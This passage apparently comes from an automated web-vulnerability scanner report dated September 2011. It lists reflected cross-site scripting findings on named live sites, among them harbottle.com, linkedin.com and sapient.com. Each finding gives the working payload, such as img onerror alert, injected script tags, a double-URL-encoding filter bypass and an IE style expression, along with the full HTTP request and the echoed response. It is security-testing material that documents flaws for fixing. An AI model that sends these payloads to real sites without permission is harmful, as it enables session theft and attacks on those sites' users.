<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<img src=a onerror=prompt(document.location)>9d536909165a5febf70e82<img src=a onerror=alert(1)>070b3549546.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.83. http://www.harbottle.com/hnl/pages/hnl_search2.php/a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b2a8a><img%20src%3da%20onerror%3dalert(1)>2ab92f55609 was submitted in the REST URL parameter 4. This input was echoed as b2a8a><img src=a onerror=alert(1)>2ab92f55609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/ab2a8a><img%20src%3da%20onerror%3dalert(1)>2ab92f55609 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:25 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5153
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/ab2a8a><img src=a onerror=alert(1)>2ab92f55609.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.84. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Issue detail

The value of REST URL parameter 5 is copied into the name of an HTML tag attribute. The payload 7efde><img%20src%3da%20onerror%3dalert(1)>d1b7aafafe7 was submitted in the REST URL parameter 5. This input was echoed as 7efde><img src=a onerror=alert(1)>d1b7aafafe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg7efde><img%20src%3da%20onerror%3dalert(1)>d1b7aafafe7 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:26 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5179
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/Chambers 2011 Firm Logo.jpg7efde><img src=a onerror=alert(1)>d1b7aafafe7.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.85. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 1e850><img%20src%3da%20onerror%3dalert(1)>dd18401005a was submitted in the REST URL parameter 5. This input was echoed as 1e850><img src=a onerror=alert(1)>dd18401005a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/1e850><img%20src%3da%20onerror%3dalert(1)>dd18401005a HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/1e850><img src=a onerror=alert(1)>dd18401005a.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.86. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e2a6e><img%20src%3da%20onerror%3dalert(1)>39a70330b58 was submitted in the REST URL parameter 5. This input was echoed as e2a6e><img src=a onerror=alert(1)>39a70330b58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/e2a6e><img%20src%3da%20onerror%3dalert(1)>39a70330b58 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:31 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5152
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/e2a6e><img src=a onerror=alert(1)>39a70330b58.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.87. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Issue detail

The value of REST URL parameter 5 is copied into the name of an HTML tag attribute. The payload 17276><img%20src%3da%20onerror%3dalert(1)>abf137323f7 was submitted in the REST URL parameter 5. This input was echoed as 17276><img src=a onerror=alert(1)>abf137323f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /hnl/pages/hnl_search2.php/pix/L500%20Logo.gif17276><img%20src%3da%20onerror%3dalert(1)>abf137323f7 HTTP/1.1
Host: www.harbottle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:49:26 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Content-Length: 5165
Connection: close
Content-Type: text/html

<body margin=0>
<div id="blanket" style="display:none;"></div>
<meta name="section" content="" />
<div id="main">
<div id="header">
<div class="w-left">
<a href="pages/
...[SNIP]...
<a href=http://www.harbottle.com/hnl/preview/pages/L500 Logo.gif17276><img src=a onerror=alert(1)>abf137323f7.php class=fineprint style="text-decoration:none">
...[SNIP]...

3.88. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/pubs/479

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed437b2915b was submitted in the REST URL parameter 4. This input was echoed as b38f5\"><script>alert(1)</script>ed437b2915b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hnl/pages/pubs/479b38f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed437b2915b HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:14 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 12483

<p><font color=red><b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"><script>alert(1)</script>ed437b29
...[SNIP]...
<img src="pix/headers/Publications.jpg" alt="banner image - Publications1055:479b38f5\"><script>alert(1)</script>ed437b2915b" />
...[SNIP]...

3.89. http://www.harbottle.com/hnl/pages/pubs/479 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.harbottle.com
Path:   /hnl/pages/pubs/479

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 345e0%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef416c8577e6 was submitted in the REST URL parameter 4. This input was echoed as 345e0--><script>alert(1)</script>f416c8577e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /hnl/pages/pubs/479345e0%252d%252d%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef416c8577e6 HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Referer: http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic; __utmb=7854507

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:18 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html
Content-Length: 12502

<p><font color=red><b>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>alert(1)</script>f416c8577e
...[SNIP]...
<!-- contact box 1055 479345e0--><script>alert(1)</script>f416c8577e6 -->
...[SNIP]...

3.90. http://www.linkedin.com/countserv/count/share [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 25dc9<img%20src%3da%20onerror%3dalert(1)>4460fcf0bcf was submitted in the url parameter. This input was echoed as 25dc9<img src=a onerror=alert(1)>4460fcf0bcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php25dc9<img%20src%3da%20onerror%3dalert(1)>4460fcf0bcf HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:33:10 GMT
Content-Length: 155

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/www.readwriteweb.com\/enterprise\/2010\/11\/oracle.php25dc9<img src=a onerror=alert(1)>4460fcf0bcf"});

3.91. http://www.sapient.com/en-us/search.html [search parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/search.html

Issue detail

The value of the search request parameter is copied into the name of an HTML tag attribute. The payload 71cf5%20style%3dx%3aexpression(alert(1))%20041bb562a4a was submitted in the search parameter. This input was echoed as 71cf5 style=x:expression(alert(1)) 041bb562a4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /en-us/search.html?search=xss%20contact%20faq%20phone71cf5%20style%3dx%3aexpression(alert(1))%20041bb562a4a HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/search.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.3.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; locale=en-us

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:49 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45804


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a title'Next' href=/en-us/search.html?search=xss contact faq phone71cf5 style=x:expression(alert(1)) 041bb562a4a&PageIndex=2>
...[SNIP]...

3.92. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c9c69<script>alert(1)</script>856d1048244 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callback HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: c9c69<script>alert(1)</script>856d1048244
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Tue, 06 Sep 2011 15:33:18 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: c9c69<script>alert(1)</script>856d1048244

3.93. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e053a"-alert(1)-"60aad715d99 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e053a"-alert(1)-"60aad715d99
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A5B13C6DD2625ADC8DB86B9CC1C99F3C; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=e053a"-alert(1)-"60aad715d99",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000"
...[SNIP]...

3.94. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6451/11953/20435-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 685de"-alert(1)-"60e51d37b2a was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6451/11953/20435-15.js?cb=0.7766812939662486&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=685de"-alert(1)-"60e51d37b2a; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=9844^2&11953^2; csi15=1295156.js^2^1315320939^1315320950&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:10 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:10 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 15:57:10 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^260; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61369; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=1300434.js^5^1315321030^1315321030&1295121.js^3^1315321030^1315321030&2553663.js^5^1315321026^1315321026&1295156.js^3^1315320939^1315321026&638177.js^2^1315313132^-1612641032; expires=Tue, 13-Sep-2011 14:57:10 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1842

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "1300434"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=685de"-alert(1)-"60e51d37b2a\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

3.95. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js [ruid cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6451/11953/20435-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dcb9"-alert(1)-"3db46c88d9f was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6451/11953/20435-2.js?cb=0.2368586107622832&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=1dcb9"-alert(1)-"3db46c88d9f; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6451/11953; ses15=9844^2&11953^5; csi15=2553663.js^2^1315321038^1315321048&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:46 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:46 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 15:57:46 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^231c9a%00%0d%0a98f953b2934&11953^5; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61333; path=/; domain=.rubiconproject.com
